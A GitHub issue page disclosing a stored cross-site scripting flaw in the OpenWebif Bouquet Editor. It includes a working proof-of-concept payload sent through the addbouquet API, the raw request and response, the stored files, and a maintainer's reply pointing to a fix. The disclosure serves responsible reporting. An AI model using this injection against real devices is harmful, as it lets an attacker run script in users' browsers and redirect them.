Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Description Inserting JavaScript code into the "Add Bouquet" function in the Bouquet Editor leads to Stored XSS. The payload in the PoC executes each time the user goes to the OWIF interface and redirects to a different webpage.
PoC/Reproduction Link to streamable
Image
Desktop
Stored userbouquets
$ cat /etc/enigma2/userbouquet._script_alert_document_domain__window_location_replace__https___github_com_kozmer_____script___tv_.tv #NAME <script>alert(document.domain);window.location.replace("https://github.com/kozmer");</script> (TV) $ cat /etc/enigma2/bouquets.tv #NAME Bouquets (TV) #SERVICE 1:7:1:0:0:0:0:0:0:0:FROM BOUQUET "userbouquet.favourites.tv" ORDER BY bouquet #SERVICE 1:7:1:0:0:0:0:0:0:0:FROM BOUQUET "userbouquet._script_alert_document_domain__window_location_replace__https___github_com_kozmer_____script___tv_.tv" ORDER BY bouquet
Request
GET /bouqueteditor/api/addbouquet?name=%3Cscript%3Ewindow.location.replace(%22https%3A%2F%2Fgithub.com%2Fkozmer%22)%3B%3C%2Fscript%3E&mode=0&_=1628087265204 HTTP/1.1 Host: 192.168.0.22 User-Agent: Mozilla/5.0 (Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest DNT: 1 Connection: close Referer: http://192.168.0.22/ Cookie: TWISTED_SESSION=<removed> Sec-GPC: 1 HTTP/1.1 200 OK Date: Wed, 04 Aug 2021 13:28:22 GMT Connection: close Content-Type: text/plain Server: TwistedWeb/16.4.0 Content-Length: 116 {"Result": [true, "Bouquet <script>window.location.replace(\"https://github.com/kozmer\");</script> (TV) created."]}
The text was updated successfully, but these errors were encountered:
Does Twisted have a lib to sanitise all:
Sorry, something went wrong.
Prevent XSS / #1387
4d2c8ad
Many thanks .. please check the latest version
No branches or pull requests
Description
Inserting JavaScript code into the "Add Bouquet" function in the Bouquet Editor leads to Stored XSS. The payload in the PoC executes each time the user goes to the OWIF interface and redirects to a different webpage.
PoC/Reproduction
Link to streamable
Image
Desktop
Stored userbouquets
Request
The text was updated successfully, but these errors were encountered: